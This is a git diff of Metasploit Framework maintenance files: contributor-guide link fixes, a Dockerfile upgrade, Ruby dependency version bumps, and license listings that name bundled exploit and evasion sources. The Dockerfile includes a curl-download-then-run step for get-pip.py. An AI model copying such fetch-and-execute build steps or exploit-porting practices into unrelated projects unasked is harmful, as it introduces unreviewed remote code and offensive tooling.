 - [Report a security vulnerability in Metasploit itself] to Rapid7. If you see something you think makes Metasploit vulnerable to an attack, let us know!  
- - [Add module documentation](https://github.com/rapid7/metasploit-framework/wiki/Generating-Module-Documentation). New documentation is always needed and cleaning up existing documents is just as important! If you're a non-native english speaker, you can help by replacing any ambiguous idioms, metaphors, or unclear language that might make our documentation hard to understand. 
+ - Add [module documentation]. New documentation is always needed and cleaning up existing documents is just as important! If you're a non-native english speaker, you can help by replacing any ambiguous idioms, metaphors, or unclear language that might make our documentation hard to understand. 


 ## Code Contributions
-For those of you who are looking to add code to Metasploit, your first step is to set up a [development environment]. Once that's done, we recommend beginners start by adding a [proof-of-concept exploit from ExploitDB,](https://www.exploit-db.com/search?verified=true&hasapp=true&nomsf=true) as a new module to the Metasploit framework. These exploits have been verified as recreatable and their ExploitDB page includes a copy of the exploitable software. This makes testing your module locally much simpler, and most importantly the exploits don't have an existing Metasploit implementation. ExploitDB can be slow to update however, so please double check that there isn't an existing module before beginning development! If you're certain the exploit you've chosen isn't already in Metasploit, read our [writing an exploit guide](https://github.com/rapid7/metasploit-framework/wiki/How-to-get-started-with-writing-an-exploit). It will help you to get started and avoid some common mistakes.
+For those of you who are looking to add code to Metasploit, your first step is to set up a [development environment]. Once that's done, we recommend beginners start by adding a [proof-of-concept exploit from ExploitDB,](https://www.exploit-db.com/search?verified=true&hasapp=true&nomsf=true) as a new module to the Metasploit framework. These exploits have been verified as recreatable and their ExploitDB page includes a copy of the exploitable software. This makes testing your module locally much simpler, and most importantly the exploits don't have an existing Metasploit implementation. ExploitDB can be slow to update however, so please double check that there isn't an existing module before beginning development! If you're certain the exploit you've chosen isn't already in Metasploit, read our [writing an exploit guide](https://github.com/rapid7/metasploit-framework/wiki/Get-Started-Writing-an-Exploit). It will help you to get started and avoid some common mistakes.

 Once you have finished your new module and tested it locally to ensure it's working as expected, check out our [guide for accepting modules](https://github.com/rapid7/metasploit-framework/wiki/Guidelines-for-Accepting-Modules-and-Enhancements#module-additions). This will give you a good idea of how to clean up your code so that it's likely to get accepted.  

@@ -92,17 +92,17 @@ curve, so keep it up!
 [50/72 rule]:http://tbaggery.com/2008/04/19/a-note-about-git-commit-messages.html
 [topic branch]:http://git-scm.com/book/en/Git-Branching-Branching-Workflows#Topic-Branches
 [draft PR]:https://help.github.com/en/articles/about-pull-requests#draft-pull-requests
-[console output]:https://help.github.com/articles/github-flavored-markdown#fenced-code-blocks
-[verification steps]:https://help.github.com/articles/writing-on-github#task-lists
+[console output]:https://docs.github.com/en/free-pro-team@latest/github/writing-on-github/creating-and-highlighting-code-blocks#fenced-code-blocks
+[verification steps]:https://docs.github.com/en/free-pro-team@latest/github/writing-on-github/basic-writing-and-formatting-syntax#task-lists
 [reference associated issues]:https://github.com/blog/1506-closing-issues-via-pull-requests
 [PR#9966]:https://github.com/rapid7/metasploit-framework/pull/9966
 [pre-commit hook]:https://github.com/rapid7/metasploit-framework/blob/master/tools/dev/pre-commit-hook.rb
 [API]:https://rapid7.github.io/metasploit-framework/api
-[Module Documentation]:https://github.com/rapid7/metasploit-framework/wiki/Generating-Module-Documentation
+[module documentation]:https://github.com/rapid7/metasploit-framework/wiki/Module-Documentation
 [scripts]:https://github.com/rapid7/metasploit-framework/tree/master/scripts
 [RSpec]:http://rspec.info
 [Better Specs]:http://www.betterspecs.org/
 [YARD]:http://yardoc.org
 [Issues]:https://github.com/rapid7/metasploit-framework/issues
 [Metasploit Slack]:https://www.metasploit.com/slack
-[#metasploit on Freenode IRC]:http://webchat.freenode.net/?channels=%23metasploit&uio=d4
+[#metasploit on Freenode IRC]:http://webchat.freenode.net/?channels=%23metasploit&uio=d4
@@ -1,7 +1,7 @@
-FROM ruby:2.6.6-alpine3.10 AS builder
+FROM ruby:2.7.2-alpine3.12 AS builder
 LABEL maintainer="Rapid7"

-ARG BUNDLER_ARGS="--jobs=8 --without development test coverage"
+ARG BUNDLER_CONFIG_ARGS="set clean 'true' set no-cache 'true' set system 'true' set without 'development test coverage'"
 ENV APP_HOME=/usr/src/metasploit-framework
 ENV BUNDLE_IGNORE_MESSAGES="true"
 WORKDIR $APP_HOME
@@ -28,15 +28,16 @@ RUN apk add --no-cache \
      ncurses-dev \
      git \
    && echo "gem: --no-document" > /etc/gemrc \
-    && gem update --system 3.0.6 \
-    && bundle install --force --clean --no-cache --system $BUNDLER_ARGS \
+    && gem update --system \
+    && bundle config $BUNDLER_ARGS \
+    && bundle install --jobs=8 \
    # temp fix for https://github.com/bundler/bundler/issues/6680
    && rm -rf /usr/local/bundle/cache \
    # needed so non root users can read content of the bundle
    && chmod -R a+r /usr/local/bundle


-FROM ruby:2.6.5-alpine3.10
+FROM ruby:2.7.2-alpine3.12
 LABEL maintainer="Rapid7"

 ENV APP_HOME=/usr/src/metasploit-framework
@@ -46,7 +47,7 @@ ENV METASPLOIT_GROUP=metasploit
 # used for the copy command
 RUN addgroup -S $METASPLOIT_GROUP

-RUN apk add --no-cache bash sqlite-libs nmap nmap-scripts nmap-nselibs postgresql-libs python python3 ncurses libcap su-exec
+RUN apk add --no-cache bash sqlite-libs nmap nmap-scripts nmap-nselibs postgresql-libs python2 python3 ncurses libcap su-exec alpine-sdk python2-dev openssl-dev nasm

 RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby)
 RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which nmap)
@@ -56,7 +57,10 @@ RUN chown -R root:metasploit /usr/local/bundle
 COPY . $APP_HOME/
 RUN chown -R root:metasploit $APP_HOME/
 RUN chmod 664 $APP_HOME/Gemfile.lock
+RUN gem update --system
 RUN cp -f $APP_HOME/docker/database.yml $APP_HOME/config/database.yml
+RUN curl -L -O https://github.com/pypa/get-pip/raw/3843bff3a0a61da5b63ea0b7d34794c5c51a2f11/get-pip.py && python get-pip.py && rm get-pip.py
+RUN pip install impacket

 WORKDIR $APP_HOME

@@ -3,8 +3,6 @@ source 'https://rubygems.org'
 #   spec.add_runtime_dependency '<name>', [<version requirements>]
 gemspec name: 'metasploit-framework'

-gem 'sqlite3', '~>1.3.0'
-
 # separate from test as simplecov is not run on travis-ci
 group :coverage do
  # code coverage for tests
@@ -23,7 +21,7 @@ group :development do
  # memory profiling
  gem 'memory_profiler'
  # cpu profiling
-  gem 'ruby-prof'
+  gem 'ruby-prof', '1.4.2'
  # Metasploit::Aggregator external session proxy
  # disabled during 2.5 transition until aggregator is available
  #gem 'metasploit-aggregator'
@@ -27,6 +27,9 @@ end

 # Create a custom group
 group :local do
-  # Add the lab gem so that the 'lab' plugin will work again
+  # This is the first way to add a non-standard gem file dependency in.
  gem 'lab', '~> 0.2.7'
+  # And this is another way that references local directories to find and compile the gem file as needed.
+  # This is the optimal method for testing Gem PRs such as those in rex-text or rex-powershell.
+  gem 'rex-powershell', path: '../rex-powershell'
 end
@@ -1,7 +1,7 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (6.0.2)
+    metasploit-framework (6.0.41)
      actionpack (~> 5.2.2)
      activerecord (~> 5.2.2)
      activesupport (~> 5.2.2)
@@ -10,7 +10,6 @@ PATH
      aws-sdk-s3
      bcrypt
      bcrypt_pbkdf
-      bit-struct
      bson
      concurrent-ruby (= 1.0.5)
      dnsruby
@@ -26,12 +25,12 @@ PATH
      jsobfu
      json
      metasm
-      metasploit-concern
-      metasploit-credential
-      metasploit-model
-      metasploit-payloads (= 2.0.10)
-      metasploit_data_models
-      metasploit_payloads-mettle (= 1.0.2)
+      metasploit-concern (~> 3.0.0)
+      metasploit-credential (~> 4.0.0)
+      metasploit-model (~> 3.1.0)
+      metasploit-payloads (= 2.0.43)
+      metasploit_data_models (~> 4.1.0)
+      metasploit_payloads-mettle (= 1.0.9)
      mqtt
      msgpack
      nessus_rest
@@ -48,6 +47,7 @@ PATH
      pcaprub
      pdf-reader
      pg
+      puma
      railties
      rb-readline
      recog
@@ -84,31 +84,32 @@ PATH
      windows_error
      xdr
      xmlrpc
+      zeitwerk

 GEM
  remote: https://rubygems.org/
  specs:
-    Ascii85 (1.0.3)
-    actionpack (5.2.4.3)
-      actionview (= 5.2.4.3)
-      activesupport (= 5.2.4.3)
+    Ascii85 (1.1.0)
+    actionpack (5.2.5)
+      actionview (= 5.2.5)
+      activesupport (= 5.2.5)
      rack (~> 2.0, >= 2.0.8)
      rack-test (>= 0.6.3)
      rails-dom-testing (~> 2.0)
      rails-html-sanitizer (~> 1.0, >= 1.0.2)
-    actionview (5.2.4.3)
-      activesupport (= 5.2.4.3)
+    actionview (5.2.5)
+      activesupport (= 5.2.5)
      builder (~> 3.1)
      erubi (~> 1.4)
      rails-dom-testing (~> 2.0)
      rails-html-sanitizer (~> 1.0, >= 1.0.3)
-    activemodel (5.2.4.3)
-      activesupport (= 5.2.4.3)
-    activerecord (5.2.4.3)
-      activemodel (= 5.2.4.3)
-      activesupport (= 5.2.4.3)
+    activemodel (5.2.5)
+      activesupport (= 5.2.5)
+    activerecord (5.2.5)
+      activemodel (= 5.2.5)
+      activesupport (= 5.2.5)
      arel (>= 9.0)
-    activesupport (5.2.4.3)
+    activesupport (5.2.5)
      concurrent-ruby (~> 1.0, >= 1.0.2)
      i18n (>= 0.7, < 2)
      minitest (~> 5.1)
@@ -117,36 +118,35 @@ GEM
      public_suffix (>= 2.0.2, < 5.0)
    afm (0.2.2)
    arel (9.0.0)
-    arel-helpers (2.11.0)
+    arel-helpers (2.12.0)
      activerecord (>= 3.1.0, < 7)
-    ast (2.4.1)
-    aws-eventstream (1.1.0)
-    aws-partitions (1.354.0)
-    aws-sdk-core (3.104.3)
+    ast (2.4.2)
+    aws-eventstream (1.1.1)
+    aws-partitions (1.445.0)
+    aws-sdk-core (3.114.0)
      aws-eventstream (~> 1, >= 1.0.2)
      aws-partitions (~> 1, >= 1.239.0)
      aws-sigv4 (~> 1.1)
      jmespath (~> 1.0)
-    aws-sdk-ec2 (1.186.0)
-      aws-sdk-core (~> 3, >= 3.99.0)
+    aws-sdk-ec2 (1.234.0)
+      aws-sdk-core (~> 3, >= 3.112.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-iam (1.43.0)
-      aws-sdk-core (~> 3, >= 3.99.0)
+    aws-sdk-iam (1.52.0)
+      aws-sdk-core (~> 3, >= 3.112.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-kms (1.36.0)
-      aws-sdk-core (~> 3, >= 3.99.0)
+    aws-sdk-kms (1.43.0)
+      aws-sdk-core (~> 3, >= 3.112.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-s3 (1.78.0)
-      aws-sdk-core (~> 3, >= 3.104.3)
+    aws-sdk-s3 (1.93.1)
+      aws-sdk-core (~> 3, >= 3.112.0)
      aws-sdk-kms (~> 1)
      aws-sigv4 (~> 1.1)
-    aws-sigv4 (1.2.1)
+    aws-sigv4 (1.2.3)
      aws-eventstream (~> 1, >= 1.0.2)
-    bcrypt (3.1.15)
-    bcrypt_pbkdf (1.0.1)
+    bcrypt (3.1.16)
+    bcrypt_pbkdf (1.1.0)
    bindata (2.4.8)
-    bit-struct (0.16)
-    bson (4.10.0)
+    bson (4.12.0)
    builder (3.2.4)
    byebug (11.1.3)
    coderay (1.1.3)
@@ -155,11 +155,11 @@ GEM
    crass (1.0.6)
    daemons (1.3.1)
    diff-lcs (1.4.4)
-    dnsruby (1.61.4)
+    dnsruby (1.61.5)
      simpleidn (~> 0.1)
-    docile (1.3.2)
+    docile (1.3.5)
    ed25519 (1.2.4)
-    em-http-request (1.1.6)
+    em-http-request (1.1.7)
      addressable (>= 2.3.4)
      cookiejar (!= 0.3.1)
      em-socksify (>= 0.3)
@@ -167,17 +167,20 @@ GEM
      http_parser.rb (>= 0.6.0)
    em-socksify (0.3.2)
      eventmachine (>= 1.0.0.beta.4)
-    erubi (1.9.0)
+    erubi (1.10.0)
    eventmachine (1.2.7)
    factory_bot (6.1.0)
      activesupport (>= 5.0.0)
    factory_bot_rails (6.1.0)
      factory_bot (~> 6.1.0)
      railties (>= 5.0.0)
-    faker (2.13.0)
+    faker (2.17.0)
      i18n (>= 1.6, < 2)
-    faraday (1.0.1)
+    faraday (1.3.0)
+      faraday-net_http (~> 1.0)
      multipart-post (>= 1.2, < 3)
+      ruby2_keywords
+    faraday-net_http (1.0.1)
    faye-websocket (0.11.0)
      eventmachine (>= 0.12.0)
      websocket-driver (>= 0.5.1)
@@ -187,25 +190,25 @@ GEM
    hrr_rb_ssh (0.3.0.pre2)
      ed25519 (~> 1.2)
    http_parser.rb (0.6.0)
-    i18n (1.8.5)
+    i18n (1.8.10)
      concurrent-ruby (~> 1.0)
-    io-console (0.5.6)
-    irb (1.2.4)
-      reline (>= 0.0.1)
+    io-console (0.5.9)
+    irb (1.3.5)
+      reline (>= 0.1.5)
    jmespath (1.4.0)
    jsobfu (0.4.2)
      rkelly-remix
-    json (2.3.1)
-    loofah (2.6.0)
+    json (2.5.1)
+    loofah (2.9.1)
      crass (~> 1.0.2)
      nokogiri (>= 1.5.9)
-    memory_profiler (0.9.14)
+    memory_profiler (1.0.0)
    metasm (1.0.4)
-    metasploit-concern (3.0.0)
+    metasploit-concern (3.0.1)
      activemodel (~> 5.2.2)
      activesupport (~> 5.2.2)
      railties (~> 5.2.2)
-    metasploit-credential (4.0.2)
+    metasploit-credential (4.0.3)
      metasploit-concern
      metasploit-model
      metasploit_data_models (>= 3.0.0)
@@ -215,37 +218,40 @@ GEM
      rex-socket
      rubyntlm
      rubyzip
-    metasploit-model (3.0.0)
+    metasploit-model (3.1.3)
      activemodel (~> 5.2.2)
      activesupport (~> 5.2.2)
      railties (~> 5.2.2)
-    metasploit-payloads (2.0.10)
-    metasploit_data_models (4.0.2)
+    metasploit-payloads (2.0.43)
+    metasploit_data_models (4.1.3)
      activerecord (~> 5.2.2)
      activesupport (~> 5.2.2)
      arel-helpers
      metasploit-concern
-      metasploit-model
+      metasploit-model (>= 3.1)
      pg
      railties (~> 5.2.2)
      recog (~> 2.0)
-    metasploit_payloads-mettle (1.0.2)
+      webrick
+    metasploit_payloads-mettle (1.0.9)
    method_source (1.0.0)
-    mini_portile2 (2.4.0)
-    minitest (5.14.1)
+    mini_portile2 (2.5.0)
+    minitest (5.14.4)
    mqtt (0.5.0)
-    msgpack (1.3.3)
+    msgpack (1.4.2)
    multipart-post (2.1.1)
    mustermann (1.1.1)
      ruby2_keywords (~> 0.0.1)
    nessus_rest (0.1.6)
-    net-ldap (0.16.2)
+    net-ldap (0.17.0)
    net-ssh (6.1.0)
    network_interface (0.0.2)
-    nexpose (7.2.1)
-    nokogiri (1.10.10)
-      mini_portile2 (~> 2.4.0)
-    octokit (4.18.0)
+    nexpose (7.3.0)
+    nio4r (2.5.7)
+    nokogiri (1.11.3)
+      mini_portile2 (~> 2.5.0)
+      racc (~> 1.4)
+    octokit (4.20.0)
      faraday (>= 0.9)
      sawyer (~> 0.8.0, >= 0.5.3)
    openssl-ccm (1.2.2)
@@ -253,13 +259,13 @@ GEM
    openvas-omp (0.0.4)
    packetfu (1.1.13)
      pcaprub
-    parallel (1.19.2)
-    parser (2.7.1.4)
+    parallel (1.20.1)
+    parser (3.0.1.0)
      ast (~> 2.4.1)
    patch_finder (1.0.2)
    pcaprub (0.13.0)
-    pdf-reader (2.4.0)
-      Ascii85 (~> 1.0.0)
+    pdf-reader (2.4.2)
+      Ascii85 (~> 1.0)
      afm (~> 0.2.1)
      hashery (~> 2.0)
      ruby-rc4
@@ -271,9 +277,12 @@ GEM
    pry-byebug (3.9.0)
      byebug (~> 11.0)
      pry (~> 0.13.0)
-    public_suffix (4.0.5)
+    public_suffix (4.0.6)
+    puma (5.2.2)
+      nio4r (~> 2.0)
+    racc (1.5.2)
    rack (2.2.3)
-    rack-protection (2.0.8.1)
+    rack-protection (2.1.0)
      rack
    rack-test (1.1.0)
      rack (>= 1.0, < 3)
@@ -282,116 +291,117 @@ GEM
      nokogiri (>= 1.6)
    rails-html-sanitizer (1.3.0)
      loofah (~> 2.3)
-    railties (5.2.4.3)
-      actionpack (= 5.2.4.3)
-      activesupport (= 5.2.4.3)
+    railties (5.2.5)
+      actionpack (= 5.2.5)
+      activesupport (= 5.2.5)
      method_source
      rake (>= 0.8.7)
      thor (>= 0.19.0, < 2.0)
    rainbow (3.0.0)
-    rake (13.0.1)
+    rake (13.0.3)
    rb-readline (0.5.5)
-    recog (2.3.14)
+    recog (2.3.19)
      nokogiri
-    redcarpet (3.5.0)
-    regexp_parser (1.7.1)
-    reline (0.1.4)
+    redcarpet (3.5.1)
+    regexp_parser (2.1.1)
+    reline (0.2.5)
      io-console (~> 0.5)
-    rex-arch (0.1.13)
+    rex-arch (0.1.14)
      rex-text
-    rex-bin_tools (0.1.6)
+    rex-bin_tools (0.1.7)
      metasm
      rex-arch
      rex-core
      rex-struct2
      rex-text
-    rex-core (0.1.13)
-    rex-encoder (0.1.4)
+    rex-core (0.1.16)
+    rex-encoder (0.1.5)
      metasm
      rex-arch
      rex-text
-    rex-exploitation (0.1.24)
+    rex-exploitation (0.1.27)
      jsobfu
      metasm
      rex-arch
      rex-encoder
      rex-text
-    rex-java (0.1.5)
-    rex-mime (0.1.5)
+      rexml
+    rex-java (0.1.6)
+    rex-mime (0.1.6)
      rex-text
-    rex-nop (0.1.1)
+    rex-nop (0.1.2)
      rex-arch
-    rex-ole (0.1.6)
+    rex-ole (0.1.7)
      rex-text
-    rex-powershell (0.1.87)
+    rex-powershell (0.1.89)
      rex-random_identifier
      rex-text
      ruby-rc4
-    rex-random_identifier (0.1.4)
+    rex-random_identifier (0.1.5)
      rex-text
-    rex-registry (0.1.3)
-    rex-rop_builder (0.1.3)
+    rex-registry (0.1.4)
+    rex-rop_builder (0.1.4)
      metasm
      rex-core
      rex-text
-    rex-socket (0.1.23)
+    rex-socket (0.1.29)
      rex-core
-    rex-sslscan (0.1.5)
+    rex-sslscan (0.1.6)
      rex-core
      rex-socket
      rex-text
-    rex-struct2 (0.1.2)
-    rex-text (0.2.28)
-    rex-zip (0.1.3)
+    rex-struct2 (0.1.3)
+    rex-text (0.2.34)
+    rex-zip (0.1.4)
      rex-text
-    rexml (3.2.4)
+    rexml (3.2.5)
    rkelly-remix (0.0.7)
-    rspec (3.9.0)
-      rspec-core (~> 3.9.0)
-      rspec-expectations (~> 3.9.0)
-      rspec-mocks (~> 3.9.0)
-    rspec-core (3.9.2)
-      rspec-support (~> 3.9.3)
-    rspec-expectations (3.9.2)
+    rspec (3.10.0)
+      rspec-core (~> 3.10.0)
+      rspec-expectations (~> 3.10.0)
+      rspec-mocks (~> 3.10.0)
+    rspec-core (3.10.1)
+      rspec-support (~> 3.10.0)
+    rspec-expectations (3.10.1)
      diff-lcs (>= 1.2.0, < 2.0)
-      rspec-support (~> 3.9.0)
-    rspec-mocks (3.9.1)
+      rspec-support (~> 3.10.0)
+    rspec-mocks (3.10.2)
      diff-lcs (>= 1.2.0, < 2.0)
-      rspec-support (~> 3.9.0)
-    rspec-rails (4.0.1)
-      actionpack (>= 4.2)
-      activesupport (>= 4.2)
-      railties (>= 4.2)
-      rspec-core (~> 3.9)
-      rspec-expectations (~> 3.9)
-      rspec-mocks (~> 3.9)
-      rspec-support (~> 3.9)
+      rspec-support (~> 3.10.0)
+    rspec-rails (5.0.1)
+      actionpack (>= 5.2)
+      activesupport (>= 5.2)
+      railties (>= 5.2)
+      rspec-core (~> 3.10)
+      rspec-expectations (~> 3.10)
+      rspec-mocks (~> 3.10)
+      rspec-support (~> 3.10)
    rspec-rerun (1.1.0)
      rspec (~> 3.0)
-    rspec-support (3.9.3)
-    rubocop (0.89.1)
+    rspec-support (3.10.2)
+    rubocop (1.12.1)
      parallel (~> 1.10)
-      parser (>= 2.7.1.1)
+      parser (>= 3.0.0.0)
      rainbow (>= 2.2.2, < 4.0)
-      regexp_parser (>= 1.7)
+      regexp_parser (>= 1.8, < 3.0)
      rexml
-      rubocop-ast (>= 0.3.0, < 1.0)
+      rubocop-ast (>= 1.2.0, < 2.0)
      ruby-progressbar (~> 1.7)
-      unicode-display_width (>= 1.4.0, < 2.0)
-    rubocop-ast (0.3.0)
-      parser (>= 2.7.1.4)
-    ruby-macho (2.2.0)
-    ruby-prof (1.4.1)
-    ruby-progressbar (1.10.1)
+      unicode-display_width (>= 1.4.0, < 3.0)
+    rubocop-ast (1.4.1)
+      parser (>= 2.7.1.5)
+    ruby-macho (2.5.0)
+    ruby-prof (1.4.2)
+    ruby-progressbar (1.11.0)
    ruby-rc4 (0.1.5)
-    ruby2_keywords (0.0.2)
-    ruby_smb (2.0.2)
+    ruby2_keywords (0.0.4)
+    ruby_smb (2.0.8)
      bindata
      openssl-ccm
      openssl-cmac
      rubyntlm
      windows_error
-    rubyntlm (0.6.2)
+    rubyntlm (0.6.3)
    rubyzip (2.3.0)
    sawyer (0.8.2)
      addressable (>= 2.3.5)
@@ -399,45 +409,48 @@ GEM
    simplecov (0.18.2)
      docile (~> 1.1)
      simplecov-html (~> 0.11)
-    simplecov-html (0.12.2)
-    simpleidn (0.1.1)
+    simplecov-html (0.12.3)
+    simpleidn (0.2.1)
      unf (~> 0.1.4)
-    sinatra (2.0.8.1)
+    sinatra (2.1.0)
      mustermann (~> 1.0)
-      rack (~> 2.0)
-      rack-protection (= 2.0.8.1)
+      rack (~> 2.2)
+      rack-protection (= 2.1.0)
      tilt (~> 2.0)
-    sqlite3 (1.3.13)
+    sqlite3 (1.4.2)
    sshkey (2.0.0)
    swagger-blocks (3.0.0)
-    thin (1.7.2)
+    thin (1.8.0)
      daemons (~> 1.0, >= 1.0.9)
      eventmachine (~> 1.0, >= 1.0.4)
      rack (>= 1, < 3)
-    thor (1.0.1)
+    thor (1.1.0)
    thread_safe (0.3.6)
    tilt (2.0.10)
-    timecop (0.9.1)
-    ttfunk (1.6.2.1)
-    tzinfo (1.2.7)
+    timecop (0.9.4)
+    ttfunk (1.7.0)
+    tzinfo (1.2.9)
      thread_safe (~> 0.1)
-    tzinfo-data (1.2020.1)
+    tzinfo-data (1.2021.1)
      tzinfo (>= 1.0.0)
    unf (0.1.4)
      unf_ext
    unf_ext (0.0.7.7)
-    unicode-display_width (1.7.0)
-    warden (1.2.8)
-      rack (>= 2.0.6)
+    unicode-display_width (2.0.0)
+    warden (1.2.9)
+      rack (>= 2.0.9)
+    webrick (1.7.0)
    websocket-driver (0.7.3)
      websocket-extensions (>= 0.1.0)
    websocket-extensions (0.1.5)
    windows_error (0.1.2)
-    xdr (3.0.1)
-      activemodel (>= 5.2.0)
-      activesupport (>= 5.2.0)
-    xmlrpc (0.3.0)
-    yard (0.9.25)
+    xdr (3.0.2)
+      activemodel (>= 4.2, < 7.0)
+      activesupport (>= 4.2, < 7.0)
+    xmlrpc (0.3.2)
+      webrick
+    yard (0.9.26)
+    zeitwerk (2.4.2)

 PLATFORMS
  ruby
@@ -454,12 +467,11 @@ DEPENDENCIES
  rspec-rails
  rspec-rerun
  rubocop
-  ruby-prof
+  ruby-prof (= 1.4.2)
  simplecov (= 0.18.2)
-  sqlite3 (~> 1.3.0)
  swagger-blocks
  timecop
  yard

 BUNDLED WITH
-   1.17.3
+   2.1.4
@@ -1,5 +1,5 @@
-Format: http://www.debian.org/doc/packaging-manuals/copyright-format/1.0/
-Source: http://www.metasploit.com/
+Format: https://www.debian.org/doc/packaging-manuals/copyright-format/1.0/
+Source: https://www.metasploit.com/

 Files: *
 Copyright: 2006-2020, Rapid7, Inc.
@@ -123,6 +123,14 @@ Files: data/jtr/*
 Copyright: Copyright 1996-2013 by Solar Designer
 License: GNU GPL 2.0

+Files: external/source/exploits/drunkpotato/Common_Src_Files/spnegotokenhandler/*
+Copyright: 2011 Jon Bringhurst
+License: GNU GPL 2.0
+
+Files: external/source/evasion/windows/process_herpaderping/ProcessHerpaderping/*
+Copyright: 2020 Johnny Shaw
+License: MIT
+
 License: BSD-2-clause
 Redistribution and use in source and binary forms, with or without modification,
 are permitted provided that the following conditions are met:
@@ -1,30 +1,29 @@
 This file is auto-generated by tools/dev/update_gem_licenses.sh
-Ascii85, 1.0.3, MIT
-actionpack, 5.2.4.3, MIT
-actionview, 5.2.4.3, MIT
-activemodel, 5.2.4.3, MIT
-activerecord, 5.2.4.3, MIT
-activesupport, 5.2.4.3, MIT
+Ascii85, 1.1.0, MIT
+actionpack, 5.2.5, MIT
+actionview, 5.2.5, MIT
+activemodel, 5.2.5, MIT
+activerecord, 5.2.5, MIT
+activesupport, 5.2.5, MIT
 addressable, 2.7.0, "Apache 2.0"
 afm, 0.2.2, MIT
 arel, 9.0.0, MIT
-arel-helpers, 2.11.0, MIT
-ast, 2.4.1, MIT
-aws-eventstream, 1.1.0, "Apache 2.0"
-aws-partitions, 1.354.0, "Apache 2.0"
-aws-sdk-core, 3.104.3, "Apache 2.0"
-aws-sdk-ec2, 1.186.0, "Apache 2.0"
-aws-sdk-iam, 1.43.0, "Apache 2.0"
-aws-sdk-kms, 1.36.0, "Apache 2.0"
-aws-sdk-s3, 1.78.0, "Apache 2.0"
-aws-sigv4, 1.2.1, "Apache 2.0"
-bcrypt, 3.1.15, MIT
-bcrypt_pbkdf, 1.0.1, MIT
+arel-helpers, 2.12.0, MIT
+ast, 2.4.2, MIT
+aws-eventstream, 1.1.1, "Apache 2.0"
+aws-partitions, 1.445.0, "Apache 2.0"
+aws-sdk-core, 3.114.0, "Apache 2.0"
+aws-sdk-ec2, 1.234.0, "Apache 2.0"
+aws-sdk-iam, 1.52.0, "Apache 2.0"
+aws-sdk-kms, 1.43.0, "Apache 2.0"
+aws-sdk-s3, 1.93.1, "Apache 2.0"
+aws-sigv4, 1.2.3, "Apache 2.0"
+bcrypt, 3.1.16, MIT
+bcrypt_pbkdf, 1.1.0, MIT
 bindata, 2.4.8, ruby
-bit-struct, 0.16, ruby
-bson, 4.10.0, "Apache 2.0"
+bson, 4.12.0, "Apache 2.0"
 builder, 3.2.4, MIT
-bundler, 1.17.3, MIT
+bundler, 2.1.4, MIT
 byebug, 11.1.3, "Simplified BSD"
 coderay, 1.1.3, MIT
 concurrent-ruby, 1.0.5, MIT
@@ -32,139 +31,145 @@ cookiejar, 0.3.3, unknown
 crass, 1.0.6, MIT
 daemons, 1.3.1, MIT
 diff-lcs, 1.4.4, "MIT, Artistic-2.0, GPL-2.0+"
-dnsruby, 1.61.4, "Apache 2.0"
-docile, 1.3.2, MIT
+dnsruby, 1.61.5, "Apache 2.0"
+docile, 1.3.5, MIT
 ed25519, 1.2.4, MIT
-em-http-request, 1.1.6, MIT
+em-http-request, 1.1.7, MIT
 em-socksify, 0.3.2, MIT
-erubi, 1.9.0, MIT
+erubi, 1.10.0, MIT
 eventmachine, 1.2.7, "ruby, GPL-2.0"
 factory_bot, 6.1.0, MIT
 factory_bot_rails, 6.1.0, MIT
-faker, 2.13.0, MIT
-faraday, 1.0.1, MIT
+faker, 2.17.0, MIT
+faraday, 1.3.0, MIT
+faraday-net_http, 1.0.1, MIT
 faye-websocket, 0.11.0, "Apache 2.0"
 filesize, 0.2.0, MIT
 fivemat, 1.3.7, MIT
 hashery, 2.1.2, "Simplified BSD"
 hrr_rb_ssh, 0.3.0.pre2, "Apache 2.0"
 http_parser.rb, 0.6.0, MIT
-i18n, 1.8.5, MIT
-io-console, 0.5.6, "Simplified BSD"
-irb, 1.2.4, "Simplified BSD"
+i18n, 1.8.10, MIT
+io-console, 0.5.9, "ruby, Simplified BSD"
+irb, 1.3.5, "ruby, Simplified BSD"
 jmespath, 1.4.0, "Apache 2.0"
 jsobfu, 0.4.2, "New BSD"
-json, 2.3.1, ruby
-loofah, 2.6.0, MIT
-memory_profiler, 0.9.14, MIT
+json, 2.5.1, ruby
+loofah, 2.9.1, MIT
+memory_profiler, 1.0.0, MIT
 metasm, 1.0.4, LGPL-2.1
-metasploit-concern, 3.0.0, "New BSD"
-metasploit-credential, 4.0.2, "New BSD"
-metasploit-framework, 6.0.2, "New BSD"
-metasploit-model, 3.0.0, "New BSD"
-metasploit-payloads, 2.0.10, "3-clause (or ""modified"") BSD"
-metasploit_data_models, 4.0.2, "New BSD"
-metasploit_payloads-mettle, 1.0.2, "3-clause (or ""modified"") BSD"
+metasploit-concern, 3.0.1, "New BSD"
+metasploit-credential, 4.0.3, "New BSD"
+metasploit-framework, 6.0.41, "New BSD"
+metasploit-model, 3.1.3, "New BSD"
+metasploit-payloads, 2.0.43, "3-clause (or ""modified"") BSD"
+metasploit_data_models, 4.1.3, "New BSD"
+metasploit_payloads-mettle, 1.0.9, "3-clause (or ""modified"") BSD"
 method_source, 1.0.0, MIT
-mini_portile2, 2.4.0, MIT
-minitest, 5.14.1, MIT
+mini_portile2, 2.5.0, MIT
+minitest, 5.14.4, MIT
 mqtt, 0.5.0, MIT
-msgpack, 1.3.3, "Apache 2.0"
+msgpack, 1.4.2, "Apache 2.0"
 multipart-post, 2.1.1, MIT
 mustermann, 1.1.1, MIT
 nessus_rest, 0.1.6, MIT
-net-ldap, 0.16.2, MIT
+net-ldap, 0.17.0, MIT
 net-ssh, 6.1.0, MIT
 network_interface, 0.0.2, MIT
-nexpose, 7.2.1, "New BSD"
-nokogiri, 1.10.10, MIT
-octokit, 4.18.0, MIT
+nexpose, 7.3.0, "New BSD"
+nio4r, 2.5.7, MIT
+nokogiri, 1.11.3, MIT
+octokit, 4.20.0, MIT
 openssl-ccm, 1.2.2, MIT
 openssl-cmac, 2.0.1, MIT
 openvas-omp, 0.0.4, MIT
 packetfu, 1.1.13, BSD
-parallel, 1.19.2, MIT
-parser, 2.7.1.4, MIT
+parallel, 1.20.1, MIT
+parser, 3.0.1.0, MIT
 patch_finder, 1.0.2, "New BSD"
 pcaprub, 0.13.0, LGPL-2.1
